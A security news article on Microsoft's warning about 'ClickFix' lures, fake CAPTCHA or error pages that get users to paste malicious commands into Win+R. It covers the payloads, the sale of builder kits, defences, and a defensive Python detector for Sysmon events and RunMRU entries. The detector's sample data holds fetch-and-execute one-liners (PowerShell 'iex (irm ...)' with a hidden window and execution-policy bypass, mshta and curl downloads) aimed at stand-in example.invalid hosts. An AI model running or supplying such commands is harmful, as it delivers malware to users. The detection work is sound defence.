
Microsoft Warns of Dangerous "ClickFix" Scam Tricking Thousands Daily Into Installing Malware

ClickFix social engineering technique growing in popularity.


Microsoft security researchers are warning about a social engineering technique known as "ClickFix" that is compromising thousands of enterprise and consumer devices worldwide every day by exploiting users' instinct to fix a technical problem themselves.

The technique tricks victims into manually executing malicious commands by presenting fake error messages, CAPTCHA verifications, or security prompts that appear to require user intervention. "Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions," Microsoft warned in a detailed threat analysis.

Unlike traditional malware that attempts to bypass security software, ClickFix manipulates users into becoming unwitting accomplices. Victims encounter seemingly legitimate error pages, often impersonating Microsoft Word, Google reCAPTCHA, or Cloudflare security checks, that instruct them to copy and paste a command into the Windows Run dialog (Win+R) or a PowerShell window to "fix" the issue. In the common variant the page has already placed the command on the clipboard, so the "fix" is just three keystrokes: Win+R, Ctrl+V, Enter. Because the user launches the command under their own account, nothing that looks like an exploit ever reaches the endpoint before execution.

HTML attachment displaying a Microsoft Word background and ClickFix lure

The scam typically begins with phishing emails, malicious advertisements, or compromised websites that redirect users to convincing landing pages. Once users follow the fake troubleshooting instructions, payloads such as Lumma Stealer, AsyncRAT, or a rootkit are installed, enabling data theft, remote access, and full system compromise.

Microsoft has observed threat actors selling ClickFix "builder kits" on underground forums for $200-$1,500 monthly, with sellers promising to bypass major security solutions, including Microsoft Defender SmartScreen. These kits offer customizable templates mimicking trusted brands and multi-language support.

The campaign has expanded beyond Windows to target macOS users with fake Spectrum cable company pages that steal passwords and install Atomic macOS Stealer (AMOS) malware.

Lampion infection chain

Protection strategies include:

  • Training users to recognize the lure: no legitimate error page, CAPTCHA, or security check ever asks you to paste a command into the Run dialog or PowerShell
  • Enabling Microsoft Defender SmartScreen warnings
  • Configuring PowerShell execution policies to block unsigned scripts, while understanding that execution policy is not a security boundary: ClickFix one-liners pass the command inline rather than as a script file and typically add -ExecutionPolicy Bypass, so this setting only raises the bar slightly
  • Using Group Policy to disable the Windows Run dialog where unnecessary (the "Remove Run menu from Start Menu" policy under User Configuration > Administrative Templates > Start Menu and Taskbar also blocks the Win+R shortcut)
  • Implementing attack surface reduction (ASR) rules in Microsoft Defender for Endpoint, managed through the Microsoft Defender XDR portal, such as the rules that block potentially obfuscated scripts and that block JavaScript or VBScript from launching downloaded executable content

Organizations should prioritize user education, since technical controls alone cannot prevent attacks in which a legitimate user runs the command under their own privileges. Education should be paired with monitoring for the traces a paste leaves behind: an interpreter such as powershell.exe or mshta.exe spawned directly by explorer.exe with a hidden window, an inline download, or a URL on its command line, and matching entries in the Run dialog's RunMRU history in the user's registry hive.
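The detection side of the protection list above, as an added example that is not code from the Cyber Kendra article or from Microsoft: a small Python detector for the two host-side artifacts a ClickFix paste produces, an interpreter spawned directly by explorer.exe (what Win+R does) and the pasted text recorded in the Run dialog's RunMRU registry key. It runs over constructed sample data embedded in the block; the field names loosely follow Sysmon Event ID 1, and the commands and example.invalid URLs are invented for illustration. The rule set (hidden window, execution policy bypass, encoded command, remote fetch, in-memory execution, mshta with a URL) is this example's own choice of indicators, not a published Microsoft signature.

```python
"""
Added example, not code from the Cyber Kendra article or from Microsoft: a small
detector for the host-side traces a ClickFix paste leaves behind. Pasting the lure's
command into Win+R makes explorer.exe spawn the interpreter directly, and Windows
records the pasted text in the Run dialog's RunMRU history. Both sources are scanned
here over constructed sample data. Field names loosely follow Sysmon Event ID 1;
the commands and the example.invalid URLs are invented for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Interpreters and living-off-the-land binaries that ClickFix lures typically launch.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}

# (label, pattern) pairs; the label is what ends up in the finding.
INDICATORS = [
    ("hidden window", re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("remote fetch", re.compile(
        r"\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|certutil\s+-urlcache)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("mshta with url", re.compile(r"mshta(?:\.exe)?\s+https?://", re.I)),
    ("url in command", re.compile(r"https?://[^\s'\"]+", re.I)),
]
# A bare URL alone is too noisy; require at least one of these before raising a finding.
STRONG = {"hidden window", "execution policy bypass", "encoded command",
          "remote fetch", "in-memory execution", "mshta with url"}


@dataclass
class Finding:
    source: str
    command: str
    reasons: list


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_indicators(command: str) -> list[str]:
    """Return the labels of every indicator present in a command line, in table order."""
    return [label for label, rx in INDICATORS if rx.search(command)]


def classify_process(event: dict) -> list[str]:
    """Reasons a process-creation event looks like a Run-dialog paste, or [] if benign.

    The rule is deliberately narrow: explorer.exe must be the parent (that is what
    Win+R produces) and the child must be a known interpreter. An interactive
    PowerShell opened from the Start menu carries no indicators and is not flagged.
    """
    if _basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if _basename(event.get("Image", "")) not in INTERPRETERS:
        return []
    reasons = match_indicators(event.get("CommandLine", ""))
    return reasons if STRONG & set(reasons) else []


def scan_events(events: list[dict]) -> list[Finding]:
    return [Finding("process", ev.get("CommandLine", ""), classify_process(ev))
            for ev in events if classify_process(ev)]


def scan_runmru(values: dict) -> list[Finding]:
    """Walk RunMRU most-recent-first; each value is the typed text plus a literal '\\1' suffix."""
    findings = []
    for key in values.get("MRUList", ""):
        raw = values.get(key, "")
        command = raw[:-2] if raw.endswith("\\1") else raw
        tokens = command.split()
        if not tokens:
            continue
        first = _basename(tokens[0])
        first = first if first.endswith(".exe") else first + ".exe"
        if first not in INTERPRETERS:
            continue  # e.g. "notepad" typed into Run
        reasons = match_indicators(command)
        if STRONG & set(reasons):
            findings.append(Finding(f"RunMRU\\{key}", command, reasons))
    return findings


# Constructed sample telemetry (not real events). The last one is a scheduled task,
# which this Run-dialog rule intentionally leaves to other detections.
CONSTRUCTED_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/verify)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/captcha"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden -File C:\ProgramData\backup.ps1"},
]
# Constructed RunMRU values as exported from HKCU\...\Explorer\RunMRU; MRUList is newest-first.
CONSTRUCTED_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "irm https://example.invalid/fix | iex"\\1',
    "c": "cmd /c curl -s https://example.invalid/a.bat -o %TEMP%\\a.bat && %TEMP%\\a.bat\\1",
}

if __name__ == "__main__":
    for f in scan_events(CONSTRUCTED_EVENTS) + scan_runmru(CONSTRUCTED_RUNMRU):
        print(f"[{f.source}] {f.command}\n    -> {', '.join(f.reasons)}")
```

On real hosts the process data comes from Sysmon Event ID 1 or the DeviceProcessEvents table in Defender for Endpoint, and RunMRU from each user's NTUSER.DAT under Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The explorer.exe parent check is what keeps the rule quiet: the same command lines launched by a scheduled task or a management agent belong to a different detection.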
